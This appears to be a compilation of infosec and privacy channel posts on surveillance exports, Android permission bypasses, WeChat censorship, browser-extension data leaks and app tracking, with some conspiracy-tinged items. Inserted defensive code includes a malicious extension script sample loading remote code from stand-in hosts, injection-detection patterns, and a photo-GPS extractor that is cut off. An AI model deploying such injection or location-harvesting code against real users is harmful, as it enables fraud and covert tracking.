EU states unanimously vote against stricter export controls for surveillance equipment
The EU wants to more closely control the trade of the European surveillance industry with autocratic regimes. After two years of tough negotiations, the member states have found a „compromise“: they are against anything that could limit the trade of spyware. Germany agreed as well.
Daniel Moßbrucker accompanies the reform of the EU Dual Use Regulation for Reporters Without Borders. The human rights NGO works globally for the protection of journalists and fights against censorship online and offline. (This text is the translation of the original German version.)
On 28 May, the UN special rapporteur on the right to freedom of opinion and expression, David Kaye, appealed to the international community and demanded a moratorium on the sale of spying technology. Everywhere in the world, journalists, activists and opposition members are being monitored with state-of-the-art technology, trade is flourishing – and global regulation is at best in its infancy.
With the same arguments, the EU Commission had already submitted a reform proposal in 2016 for the European control system. The items include hacking software, large data centres for data retention, IMSI catchers for monitoring demonstrations and equipment for telecommunications surveillance.
For more than two years, the EU member states had been arguing fiercely about the Commission’s plans before they presented their „compromise“ exactly one week after Kaye’s demand. They are against any plans that would allow stronger controls on surveillance technology.
Read more:
https://rwtxt.lelux.fi/blackbox/peu-states-unanimously-vote-against-stricter-export-controls-for-surveillance-equipmentp
#EU #surveillance #export #equipment
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
50 Ways to Leak Your Data: An Exploration of Apps’ Circumvention of the Android Permissions System
Apps can also access tracking data without authorization
The Android permission model can be circumvented with tricks. A study found 1,325 apps that can access the corresponding data even without authorization.
The Android authorization system is designed to protect particularly sensitive data. Only when the user grants an app the corresponding authorization can it access the location or the device ID, for example. However, some applications bypass the permissions by accessing the corresponding data in other ways. Researchers at Berkeley University (USA), the IMDEA Networks Institute (Spain) and the University of Calgary (Canada) found this out.
PDF:
https://www.ftc.gov/system/files/documents/public_events/1415032/privacycon2019_serge_egelman.pdf
#android #data #circumvent #tracking #authorization #poc
Audio
🎧 The Internet’s Carbon Footprint
Manoush Zomorodi explores the surprising environmental impact of the internet in this episode of IRL. Because while it’s easy to think of the internet as living only on your screen, energy demand for the internet is indeed powered by massive server farms, running around the clock, all over the world. What exactly is the internet’s carbon footprint? And, what can we do about it?
📻 https://irlpodcast.org/
#IRL #carbon #footprint #podcast
(Can’t) Picture This 2 An Analysis of WeChat’s Realtime Image Filtering in Chats
Key Findings:
👁🗨 WeChat implements realtime, automatic censorship of chat images based on text contained in images and on an image’s visual similarity to those on a blacklist
👁🗨 WeChat facilitates realtime filtering by maintaining a hash index populated by MD5 hashes of images sent by users of the chat platform
👁🗨 We compare levels of filtering across WeChat’s Moments, group chat, and 1-to-1 chat features and find that each has different images censored; we find that Moments and group chat are generally more heavily filtered than 1-to-1
👁🗨 WeChat targets predominantly political content including images pertaining to government and social resistance
👁🗨 WeChat’s image censorship is reactive to news events; we found censored images covering a wide range of events, including the arrest of Huawei’s CFO, the Sino-US Trade War, and the 2018 US Midterm Elections
https://citizenlab.ca/2019/07/cant-picture-this-2-an-analysis-of-wechats-realtime-image-filtering-in-chats/
#WeChat #filter #realtime #images #china #censorship
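As an added illustration of the two mechanisms named in the findings above (an MD5 hash index for exact copies and a visual-similarity check for near-copies), not code from the Citizen Lab report: a minimal Python filter over constructed 8x8 grayscale images. The average hash as similarity measure and the Hamming threshold of 10 are assumptions of this example.

```python
import hashlib

# Constructed 8x8 grayscale sample images (rows of 0-255 ints); not real chat data.
BLOCKED = [[10, 20, 30, 40, 200, 210, 220, 230] for _ in range(8)]   # left dark, right bright
# The same picture after a re-encode: every pixel 5 brighter plus one pixel of noise.
ALTERED = [[v + 5 for v in row] for row in BLOCKED]
ALTERED[0][0] += 1
# A visually different picture: top dark, bottom bright.
UNRELATED = [[30] * 8 for _ in range(4)] + [[210] * 8 for _ in range(4)]


def image_bytes(img):
    """Serialise the pixel grid the way a raw image buffer would be hashed."""
    return bytes(v for row in img for v in row)


def md5_of(img):
    """Exact-match fingerprint: any changed byte yields a different digest."""
    return hashlib.md5(image_bytes(img)).hexdigest()


def ahash(img):
    """Average hash: one bit per pixel, set when the pixel is at or above the mean.
    It tolerates brightness shifts and small noise, so it captures visual similarity."""
    pixels = [v for row in img for v in row]
    mean = sum(pixels) / len(pixels)
    bits = 0
    for v in pixels:
        bits = (bits << 1) | (1 if v >= mean else 0)
    return bits


def hamming(a, b):
    """Number of differing bits between two 64-bit hashes."""
    return bin(a ^ b).count("1")


class ImageFilter:
    """Two-layer blocklist: an MD5 index for exact copies and a perceptual-hash
    list for near-copies. The threshold value is an assumption of this example."""

    def __init__(self, threshold=10):
        self.md5_index = set()
        self.ahash_list = []
        self.threshold = threshold

    def add_blocked(self, img):
        # The report describes the index being populated with hashes of images
        # users send; here a flagged image is added to both layers.
        self.md5_index.add(md5_of(img))
        self.ahash_list.append(ahash(img))

    def check(self, img):
        """Return 'exact', 'similar' or 'allowed' for an outgoing image."""
        if md5_of(img) in self.md5_index:
            return "exact"
        h = ahash(img)
        if any(hamming(h, b) <= self.threshold for b in self.ahash_list):
            return "similar"
        return "allowed"


def demo():
    """Classify the three constructed images against a filter seeded with BLOCKED."""
    f = ImageFilter()
    f.add_blocked(BLOCKED)
    return f.check(BLOCKED), f.check(ALTERED), f.check(UNRELATED)


if __name__ == "__main__":
    print(demo())  # ('exact', 'similar', 'allowed')
```

The re-encoded copy misses the MD5 index but is caught by the perceptual layer, which is why the report lists both the hash index and the visual-similarity check as separate mechanisms.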
The WORST Part of the Epstein Case – #PropagandaWatch
According to the dinosaur media, the worst part about the exposure of Jeffrey #Epstein’s child sex trafficking and high-level #blackmail operation is that it bolsters #conspiracy theories about child sex trafficking and elite corruption.
❗️Newsflash: they’re trying to gaslight you. Don’t fall for it for a second.
📺 https://www.corbettreport.com/the-worst-part-of-the-epstein-case-propagandawatch/
#corbettreport #video #podcast
Security reports reveal how Assange turned an embassy into a command post for election meddling
New documents obtained exclusively by CNN reveal that WikiLeaks founder Julian Assange received in-person deliveries, potentially of hacked materials related to the 2016 US election, during a series of suspicious meetings at the Ecuadorian Embassy in London.
The documents build on the possibility, raised by special counsel Robert Mueller in his report on Russian meddling, that couriers brought hacked files to Assange at the embassy.
The surveillance reports also describe how Assange turned the embassy into a command center and orchestrated a series of damaging disclosures that rocked the 2016 presidential campaign in the United States.
Despite being confined to the embassy while seeking safe passage to Ecuador, Assange met with Russians and world-class hackers at critical moments, frequently for hours at a time. He also acquired powerful new computing and network hardware to facilitate data transfers just weeks before WikiLeaks received hacked materials from Russian operatives.
These stunning details come from hundreds of surveillance reports compiled for the Ecuadorian government by UC Global, a private Spanish security company, and obtained by CNN. They chronicle Assange’s movements and provide an unprecedented window into his life at the embassy. They also add a new dimension to the Mueller report, which cataloged how WikiLeaks helped the Russians undermine the US election.
An Ecuadorian intelligence official told CNN that the surveillance reports are authentic.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/exclusive-security-reports-reveal-how-assange-turned-an-embassy-into-a-command-post-for-election-meddling
#FreeAssange #thinkabout
Shelter: Isolate Big Brother apps - Take back control! (Part 7)
1. Big Data
The collection, processing and analysis of as much information as possible is Big Data’s core business. In this opaque, algorithm-driven data processing, personal rights are hardly taken into consideration. This dilemma becomes particularly clear in the Android world: apps access personal data without restraint and send it, unasked, to a wide range of third parties. This is exactly what the article series “Take back control!” aims to protect against.
Another piece of the puzzle toward this goal is the app Shelter, which locks selected Android apps in a sandbox, depriving them of access to contacts, calendars, images and other data. Curious apps can thus be denied access to sensitive user data.
💡 This article is part of a series of articles:
✅ Android without Google: Take back control! Part 1
✅ LineageOS - Take back control! Part 2
✅ Magisk: By the power of Root - Take back control! Part 3 (not yet translated)
✅ AFWall+: Digital Door Controller - Take back control! Part 4
✅ F-Droid: Free and Open Source Apps - Take back control! Part 5
✅ AdAway: Advertising and tracking blocker - Take back control! Part 6
✅ Shelter: Isolate Big Brother apps - Take back control! Part 7
2. Shelter
Shelter is an open source app for Android that can be downloaded from the F-Droid app store. Alternatively, the app is available via GitHub or the Google Play Store.
To separate apps, Shelter uses the Android work profiles that Google introduced as early as 2015 to keep private data apart from business content and apps. The work profile is a specially isolated area in which, for example, data-hungry apps can be placed. Alongside the normal environment in which all apps usually live, Shelter creates a second workspace that is logically separated from it. Apps inside this bunker (the Shelter) cannot access data in the normal environment, but they can access all data of other apps that are also stored or locked in the Shelter.
👉🏼 Read the fully translated guide:
https://rwtxt.lelux.fi/blackbox/shelter-isolate-big-brother-apps-take-back-control-part-7
👉🏼 Source 🇩🇪:
https://www.kuketz-blog.de/shelter-big-brother-apps-isolieren-take-back-control-teil7/
#android #shelter #NoGoogle #guide #part1 #part2 #part4 #part5 #part6 #part7 #kuketz
Amazon is listening to your kids and visitors, warns German parliament report
Smart speakers like Alexa not only store the voices of their registered users, but also those of children and unsuspecting guests. This constitutes a legal problem, says a report commissioned by the German parliament.
Amazon’s voice assistant listens far more often than people might know. Alexa does not only pick up the voices of adults who consciously interact with the system, but also those of others who do not know the assistant is recording them. That could be a visitor or a minor.
This function of Alexa is now the subject of a report by the Research Service of the German parliament, the Bundestag. The service is impartial, researching and analysing information on behalf of committees and at the request of members of parliament. The paper examines whether the recording, transcription and evaluation of voice recordings by Amazon are legal under German law.
When Alexa is first installed, users must give their consent to the processing and storage of their data. The mandatory information about the use and administration of their data is described sufficiently on Amazon’s website and in the Alexa app, according to the experts. Users can manage and delete the stored data in their profile. However, it remains unclear for how long Amazon stores the voice recordings and how often the software records unintended noises and conversations.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/amazon-is-listening-to-your-kids-and-visitors-warns-german-parliament-report
#DeleteAmazon #Alexa #DataProtection #privacy
SwiftKey: BlackBox with permanent tracking
On the fourth day of the App Review Week, I test the Android app SwiftKey (version 7.3.3.12) - a keyboard app from Microsoft that accepts input via swipe gestures. Let’s start with the network connections that SwiftKey establishes during use.
App start: Immediately after start (no user interaction)
[1] Immediately after startup, the app contacts the SwiftKey servers [jenson.api.swiftkey.com] to update LanguagePack information:
GET /swiftkey/sksdk-3.0/sk-7.3.3/market/languagePacksSSL.json HTTP/1.1
Accept-Encoding: gzip, deflate
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Mi A1 Build/PQ3A.190705.003)
Host: jenson.api.swiftkey.com
Connection: close

[2] The updates for the language packs (LanguagePacks) are then downloaded via a cloudfront server [d4kkhvu20wq9i.cloudfront.net]:
👉🏼 Full translated review:
https://rwtxt.lelux.fi/blackbox/swiftkey-blackbox-with-permanent-tracking
Source 🇩🇪:
https://www.kuketz-blog.de/swiftkey-blackbox-mit-dauerhaftem-tracking/
#SwiftKey #App #review #kuketz
Firefox classifies HTTP websites as insecure in the future
The feature is already active in Firefox 70, which is currently available only in the Nightly channel. But Firefox 68 can also be configured manually so that the URLs of unencrypted websites are shown with a crossed-out lock and the label "Not secure".
💡 According to the report, the security warning is now activated in the Nightly version of Firefox 70.
Users of the current version 68 can already unlock the feature via the configuration page "about:config". You simply have to change the following settings by double clicking to "True":
„security.insecure_connection_icon.enabled“
„security.insecure_connection_icon.pbmode.enabled“
„security.insecure_connection_text.enabled“
„security.insecure_connection_text.pbmode.enabled“
https://www.ghacks.net/2019/07/18/firefox-to-mark-all-http-sites-as-not-secure/
#mozilla #firefox #browser #tip #tricks #HTTP #encryption
Amazon is turning advertising into its next huge business — here’s how
☢️ Amazon has built a huge advertising business. Here’s a little more about how it all works.
☢️ The e-commerce giant lets advertisers reach consumers through product ads or even videos on third-party websites.
☢️ While shopping on Prime Day, this is how to spot and understand some of the ad products used to encourage you to buy certain products.
If you were browsing Amazon in search of deals for Prime Day, you undoubtedly came across a lot of ads. That’s because Amazon has a trove of information about buying habits that makes it a valuable place for advertisers.
Think about it: Amazon knows the last time you bought toothpaste on the site and which brand you typically like to buy. Advertisers can use that information to try to get you to buy their brand of toothpaste right when you’re running low.
Other advertisers can use Amazon to target ads, even if they’re selling products that you can’t necessarily buy on Amazon, like insurance or a car. These advertisers can use Amazon’s extensive customer data to figure out who might buy their product or services, and they can use Amazon’s ad products to reach those people, both on Amazon’s properties and through a network of third-party sites.
This rich trove of data has made Amazon into the third-largest digital ad platform in the U.S. and a growing contender to take on the digital ad duopoly of Google and Facebook. Earlier this year, eMarketer said it expected Amazon to claim 8.8% of U.S. digital ad spend in 2019, up from 6.8% in 2018, while expecting Google to drop from 38.2% to 37.2%. Meanwhile, Facebook was expected to pull 22.1% of digital ad spend in 2019, up very slightly from 21.8%. Amazon’s net sales in its “other” category, which consists primarily of advertising sales, was $2.72 billion in the first quarter.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/amazon-is-turning-advertising-into-its-next-huge-business-heres-how
#DeleteAmazon #advertising #business
Newly Discovered Malware Framework Cashing in on Ad Fraud
A newly discovered malware framework is responsible for more than one billion fraudulent ad impressions in the past three months, generating its operators significant Google AdSense revenue on a monthly basis.
Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams.
The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex’s browser.
Most video and streaming services have tiers for their content producers, which determine how much they are paid for their content. Content producers benefit financially from higher counts, which can lead to some unscrupulous behavior.
Flashpoint researchers found code, for example, that looks for YouTube referrers and then injects a new noscript tag to load code for YouTube. In this case, the injected JavaScript has an extensive amount of code that is designed to like videos, most of which are related to political topics in Russia. Separately, researchers also found code that injects an iframe into the browser designed to play a hidden Twitch stream, padding the viewer stats for the streamer on that page.
Read more:
https://www.flashpoint-intel.com/blog/newly-discovered-malware-framework-cashing-in-on-ad-fraud/
#malware #malicious #framework #AdFraud #AdSense #browser #extension
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
A newly discovered malware framework is responsible for more than one billion fraudulent ad impressions in the past three months, generating its operators significant Google AdSense revenue on a monthly basis.
Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams.
The framework pads statistics on social sites and ad impressions, creating revenue for its operators, who use a botnet to spread the malware and target the content and advertising platforms through browsers including Google Chrome, Mozilla Firefox and Yandex Browser.
Most video and streaming services have tiers for their content producers that determine how much they are paid for their content. Producers benefit financially from higher counts, which can invite unscrupulous behaviour.
Flashpoint researchers found code, for example, that looks for YouTube referrers and then injects a new script tag to load code for YouTube. In this case the injected JavaScript contains an extensive amount of code designed to like videos, most of them related to political topics in Russia. Separately, researchers also found code that injects an iframe into the page to play a hidden Twitch stream, padding the viewer stats for the streamer on that page.
Read more:
https://www.flashpoint-intel.com/blog/newly-discovered-malware-framework-cashing-in-on-ad-fraud/
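Triage of an extension behaving as described, as an added example that is not Flashpoint's code or the framework's: it reads a constructed manifest and content script (hypothetical file names and `.invalid` domains) and flags the combination the post describes, broad permissions, a referrer check, a dynamically injected script tag and a hidden iframe pointed at a remote stream. The permission list and regexes are the editor's heuristics, not a published signature set.

```python
import json
import re

# Permissions that let an extension read or rewrite every page the user visits.
HIGH_RISK_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking",
                         "tabs", "history", "cookies", "declarativeNetRequest"}

# Source patterns typical of impression/engagement fraud in content scripts (heuristic).
PATTERNS = {
    "referrer check": re.compile(r"document\.referrer"),
    "dynamic script injection": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "iframe injection": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)"),
    "hidden element": re.compile(r"display\s*[:=]\s*['\"]?none|visibility\s*[:=]\s*['\"]?hidden|\.hidden\s*=\s*true"),
    "synthetic click": re.compile(r"\.click\(\)|dispatchEvent\(\s*new\s+MouseEvent"),
    "remote code source": re.compile(r"\.src\s*=\s*['\"]?https?://"),
}


def triage_extension(manifest_json, scripts):
    """Static triage of an unpacked extension.
    manifest_json: manifest.json text; scripts: {filename: JavaScript source}.
    Returns the findings and whether they match the impression-fraud shape."""
    manifest = json.loads(manifest_json)
    scopes = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        scopes.update(cs.get("matches", []))
    findings = []
    broad = sorted(scopes & HIGH_RISK_PERMISSIONS)
    if broad:
        findings.append(("manifest", "broad permissions: " + ", ".join(broad)))
    for name, src in scripts.items():
        for label, rx in PATTERNS.items():
            if rx.search(src):
                findings.append((name, label))
    labels = {label for _, label in findings}
    # The two behaviours the post describes: referrer-gated remote script injection,
    # and a hidden iframe loading a remote stream.
    fraud_shape = ({"referrer check", "dynamic script injection", "remote code source"} <= labels
                   or {"iframe injection", "hidden element", "remote code source"} <= labels)
    return {"findings": findings, "fraud_shape": fraud_shape}


# Constructed sample: a hypothetical extension, not a real one.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Video Helper",
    "permissions": ["<all_urls>", "tabs", "webRequest"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
})
SAMPLE_SCRIPTS = {
    "inject.js": """
        if (document.referrer.indexOf('youtube.com') !== -1) {
          var s = document.createElement('script');
          s.src = 'https://cdn.example.invalid/yt.js';      // hypothetical remote loader
          document.head.appendChild(s);
        }
        var f = document.createElement('iframe');
        f.style.display = 'none';
        f.src = 'https://player.example.invalid/stream';    // hypothetical hidden stream
        document.body.appendChild(f);
    """,
}

if __name__ == "__main__":
    for item in triage_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS)["findings"]:
        print(item)
```

Run it against an unpacked extension directory by reading `manifest.json` and each file listed under `content_scripts` into the `scripts` dict; the patterns are deliberately loose, so treat a `fraud_shape` hit as a reason to look at the code, not as a verdict.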
#malware #malicious #framework #AdFraud #AdSense #browser #extension
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
David K. Levine is Against Intellectual Monopoly
David K. Levine is an economist at the European University Institute and at Washington University in St. Louis. He is the author with Michele Boldrin of Against Intellectual Monopoly, an empirical study of the economics of intellectual property that concludes that IP is not necessary for innovation and as a practical matter is damaging to growth, prosperity and liberty.
📺 https://www.corbettreport.com/david-k-levine-is-against-intellectual-monopoly/
#corbettreport #intellectual #monopoly #video #podcast
NBC Released A Tape Showing Donald Trump and Jeffrey Epstein discussing women at 1992 party
In footage from 1992 released this week by NBC, United States President Donald Trump can be seen joking and laughing with Jeffrey Epstein at a party.
Trump said that Epstein was a “terrific guy”.
“He’s a lot of fun to be with. It is even said that he likes beautiful women as much as I do, and many of them are on the younger side,” Trump said at the time.
https://www.nbcnews.com/news/us-news/tape-shows-donald-trump-jeffrey-epstein-discussing-women-1992-party-n1030686
#Epstein #Trump #pedo #conspiracy #SexTrafficking
Tracking sex: The implications of widespread sexual data leakage and tracking on porn websites
This paper explores tracking and privacy risks on pornography websites. Our analysis of 22,484 pornography websites indicated that 93% leak user data to a third party.
Tracking on these sites is highly concentrated in the hands of a handful of major companies, which we identify. We successfully extracted privacy policies for 3,856 sites, 17% of the total. The policies were written such that one might need a two-year college education to understand them.
Our content analysis of the sample's domains indicated 44.97% of them expose or suggest a specific gender/sexual identity or interest likely to be linked to the user. We identify three core implications of the quantitative results: 1) the unique/elevated risks of porn data leakage versus other types of data, 2) the particular risks/impact for vulnerable populations, and 3) the complications of providing consent for porn site users and the need for affirmative consent in these online sexual interactions.
PDF - Analysis:
https://arxiv.org/pdf/1907.06520.pdf
#study #analysis #sex #porn #websites #tracking #google #facebook #pdf
DataSpii: The catastrophic data leak via browser extensions
We present DataSpii (pronounced data-spy), the catastrophic data leak that occurs when any one of eight browser extensions collects browsing activity data — including personally identifiable information (PII) and corporate information (CI) — from unwitting Chrome and Firefox users.
Our investigation uncovered an online service selling the collected browsing activity data to its subscription members in near real-time. In this report, we delineate the sensitive data source types relevant to the security of individuals and businesses across the globe.
We observed two extensions employing dilatory tactics — an effective maneuver for eluding detection — to collect the data. We identified the collection of sensitive data from the internal network environments of Fortune 500 companies.
Several Fortune 500 companies provided an additional measure of confirmation through a process of responsible disclosure. By deploying a honeypot to monitor web traffic, we discovered near-immediate visits to URLs collected by the extensions. To address the evolving threat to data security, we propose preemptive measures such as limiting access to shareable links, and removing PII and CI from metadata.
👉🏼 https://securitywithsam.com/2019/07/dataspii-leak-via-browser-extensions/
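The report's two countermeasures, limiting what a shareable link gives away and stripping PII and corporate information from collected metadata, are illustrated by the following added example (the editor's, not the DataSpii authors' tooling). Given a URL of the kind an extension of this class would collect, it reports what the URL leaks and returns a redacted form that could be logged safely. The parameter names, intranet suffixes and the "long opaque segment with a digit" rule for capability tokens are the editor's heuristics; the sample URLs are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Query parameters that usually carry a credential, a session or a person (heuristic list).
SENSITIVE_PARAMS = {"token", "access_token", "auth", "key", "apikey", "api_key",
                    "sig", "signature", "session", "sessionid", "sid", "code",
                    "password", "email"}
# A long opaque path segment containing digits is typically a capability token
# ("anyone with the link can view"): knowing the URL is knowing the secret.
CAPABILITY_SEGMENT = re.compile(r"^(?=.*\d)[A-Za-z0-9_-]{20,}$")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
INTERNAL_SUFFIXES = (".local", ".corp", ".internal", ".lan", ".intranet")


def is_internal_host(host):
    """Private IP or intranet-style name: the corporate information (CI) case."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return host.endswith(INTERNAL_SUFFIXES) or "." not in host


def audit_url(url):
    """Return (redacted_url, findings): what a URL-collecting extension would have seen,
    and the form in which the same URL could be logged without leaking PII/CI."""
    p = urlsplit(url)
    findings = []
    host = p.hostname or ""
    if p.username or p.password:
        findings.append("credentials in authority")
    if is_internal_host(host):
        findings.append("internal host")
    segs = []
    for s in p.path.split("/"):
        if CAPABILITY_SEGMENT.match(s):
            findings.append("capability token in path")
            s = "<token>"
        elif EMAIL.fullmatch(s):
            findings.append("email in path")
            s = "<email>"
        segs.append(s)
    query = []
    for k, v in parse_qsl(p.query, keep_blank_values=True):
        if k.lower() in SENSITIVE_PARAMS or EMAIL.fullmatch(v):
            findings.append(f"sensitive query parameter '{k}'")
            v = "<redacted>"
        query.append((k, v))
    if p.fragment:
        findings.append("fragment dropped")   # client-side state such as OAuth tokens lives here
    netloc = host + (f":{p.port}" if p.port else "")
    redacted = urlunsplit((p.scheme, netloc, "/".join(segs), urlencode(query, safe="<>"), ""))
    return redacted, findings


# Constructed sample URLs (hypothetical hosts and values).
SAMPLE_URLS = [
    "https://docs.example.com/d/1aB2cD3eF4gH5iJ6kL7mN8oP9/edit?usp=sharing#heading",
    "https://app.example.com/reset?email=jane.doe@example.com&token=abc123",
    "http://wiki.corp.local/projects/rocket-report",
    "https://10.0.0.5:8443/api/v1/users?sig=deadbeef",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        redacted, findings = audit_url(u)
        print(redacted, findings)
```

The useful part for a defender is the findings list: a history of URLs that an extension has already shipped off cannot be recalled, but running this over a proxy log tells you which shareable links and internal hosts to assume compromised, and the redacted form is what an in-house collector (crash reporter, analytics, SIEM) should store instead of the raw URL.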
I found your data. It’s for sale.
As many as 4 million people have Web browser extensions that sell their every click. And that’s just the tip of the iceberg.
I’ve watched you check in for a flight and seen your doctor refilling a prescription.
I’ve peeked inside corporate networks at reports on faulty rockets. If I wanted, I could’ve even opened a tax return you only shared with your accountant.
I found your data because it’s for sale online. Even more terrifying: It’s happening because of software you probably installed yourself.
My latest investigation into the secret life of our data is not a fire drill. Working with an independent security researcher, I found as many as 4 million people have been leaking personal and corporate secrets through Chrome and Firefox. Even a colleague in The Washington Post’s newsroom got caught up. When we told browser makers Google and Mozilla, they shut these leaks immediately — but we probably identified only a fraction of the problem.
👉🏼 https://www.washingtonpost.com/technology/2019/07/18/i-found-your-data-its-sale/
#DataSpii #DataSpy #browser #extensions #data #leak #security #investigation #chrome #firefox
Not only FaceApp: thousands of apps spy even when denied permission
The case of FaceApp, the app that uses artificial intelligence to age a face and show a realistic image, has drawn attention to a common practice that few users notice. On installing it, you are warned that all your data will be used and even handed to third parties, so you lose control of it. In this case the warning comes in a process that few users read, or that they accept without thinking about the consequences. But some mobile apps may not even need explicit consent. Thousands of apps get around the restrictions and spy even when they are not authorised.
Why does a phone's flashlight need access to a user's location? Or a photo-editing app to the microphone? Or a voice recorder to the contacts? In principle, these apps do not need such permissions to work. When they access them, it is usually in search of an extremely valuable commodity: data. Users can grant or deny apps various permissions to access their location, contacts or the files stored on the phone. But an investigation by a team of cybersecurity experts has revealed that as many as 12,923 apps have found ways to keep collecting private information despite having been explicitly denied those permissions.
The study highlights how hard it is for users to protect their privacy. Researchers from the International Computer Science Institute (ICSI) in Berkeley, IMDEA Networks Institute in Madrid, the University of Calgary and AppCensus analysed a total of 88,000 apps from the Play Store and observed thousands of them accessing information, such as location or device data, that the user had previously denied them.
The researchers have not yet published the full list of apps engaging in these practices. But according to the study, they include the Hong Kong Disneyland park app, Samsung's browser and the Chinese search engine Baidu. The number of potentially affected users is in the "hundreds of millions".
Borja Adsuara, a lawyer specialising in digital law, says this is "a very serious infringement" because the Android operating system requires apps to request consented access to this data through permissions, and the user expressly tells them no. Consent, he explains, works very similarly for physical privacy and for non-physical privacy (personal data). "It is like a case of rape in which the victim expressly says no," he states.
Narseo Vallina-Rodríguez, co-author of the study, notes that "it is not clear whether there will be patches or updates for the billions of Android users who today run versions of the operating system with these vulnerabilities." Google did not tell this newspaper whether it plans to withdraw from the market, or take any other action against, the apps that, according to the study, access user data without the relevant permission. It did say that the problem will be resolved in Android Q, the next version of its operating system. The company plans to release six beta versions over the year before the final version in the third quarter.
How do apps access private user information without the necessary permissions? Apps bypass the operating system's controls via side channels and covert channels. Vallina offers the following comparison: "To get into a house [the user's data] you can go through the door with the key the owner gave you [the permission], but you can also get in without the owner's consent by exploiting a weakness in the door [a side channel] or with the help of someone who is already inside [a covert channel]."
"You can open a door with a key, but you can also find a way to do it without that key." The same goes for a device's geolocation: you may not have access to the GPS, but you can find a way to get at the user's position information.
Metadata
One way to do this is through the metadata embedded in the photographs taken by the smartphone's owner, according to Vallina. "By default, every photograph an Android user takes contains metadata such as the position and time at which it was taken. Several apps access the user's historical location by requesting permission to read the memory card, because that is where the photographs are stored, without having to request GPS access," he says. That is the case of Shutterfly, a photo-editing app. The researchers verified that it was collecting GPS coordinates from users' images even when they had denied it permission to access their location.
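What reading "the memory card" yields, as an added example that is not the study's code or Shutterfly's: a parser that walks a JPEG's APP1 segment, the TIFF header, IFD0 and the GPS IFD, and converts the degrees/minutes/seconds rationals into a decimal position, which is all an app with only storage access needs to rebuild a location history. `build_geotagged_jpeg` produces a constructed minimal JPEG (EXIF GPS block only, no image data, made-up coordinates) so the reader runs offline.

```python
import struct


def _read_ifd(tiff, offset, e):
    """Return {tag: (type, count, 4-byte value/offset field)} for the IFD at offset."""
    (n,) = struct.unpack(e + "H", tiff[offset:offset + 2])
    entries, pos = {}, offset + 2
    for _ in range(n):
        tag, typ, count = struct.unpack(e + "HHI", tiff[pos:pos + 8])
        entries[tag] = (typ, count, tiff[pos + 8:pos + 12])
        pos += 12
    return entries


def _rationals(tiff, entry, e):
    """Decode a RATIONAL (type 5) array stored at the entry's offset."""
    typ, count, raw = entry
    (off,) = struct.unpack(e + "I", raw)
    out = []
    for i in range(count):
        num, den = struct.unpack(e + "II", tiff[off + 8 * i:off + 8 * i + 8])
        out.append(num / den if den else 0.0)
    return out


def _dms_to_decimal(dms):
    d, m, s = dms
    return d + m / 60 + s / 3600


def exif_gps(jpeg):
    """Return (lat, lon) in decimal degrees from a JPEG's EXIF GPS IFD, or None."""
    if jpeg[:2] != b"\xff\xd8":                 # SOI
        return None
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xD9:                      # EOI reached without an Exif APP1
            return None
        (seg_len,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        if marker == 0xE1 and jpeg[pos + 4:pos + 10] == b"Exif\x00\x00":
            tiff = jpeg[pos + 10:pos + 2 + seg_len]
            e = "<" if tiff[:2] == b"II" else ">"   # byte order of the TIFF block
            (ifd0_off,) = struct.unpack(e + "I", tiff[4:8])
            ifd0 = _read_ifd(tiff, ifd0_off, e)
            if 0x8825 not in ifd0:              # no GPSInfo IFD pointer
                return None
            (gps_off,) = struct.unpack(e + "I", ifd0[0x8825][2])
            gps = _read_ifd(tiff, gps_off, e)
            if not all(t in gps for t in (1, 2, 3, 4)):   # LatRef, Lat, LonRef, Lon
                return None
            lat = _dms_to_decimal(_rationals(tiff, gps[2], e))
            lon = _dms_to_decimal(_rationals(tiff, gps[4], e))
            if gps[1][2][:1] == b"S":
                lat = -lat
            if gps[3][2][:1] == b"W":
                lon = -lon
            return round(lat, 6), round(lon, 6)
        pos += 2 + seg_len
    return None


def build_geotagged_jpeg(lat, lon):
    """Constructed sample: a minimal JPEG whose only content is an EXIF GPS IFD."""
    e = "<"

    def rat3(deg):                              # degrees, minutes, seconds as RATIONALs
        deg = abs(deg)
        d = int(deg)
        m = int((deg - d) * 60)
        s = (deg - d - m / 60) * 3600
        return struct.pack(e + "IIIIII", d, 1, m, 1, int(round(s * 1000)), 1000)

    # TIFF block layout: 0 header(8) | 8 IFD0(18) | 26 GPS IFD(54) | 80 lat(24) | 104 lon(24)
    hdr = b"II" + struct.pack(e + "HI", 42, 8)
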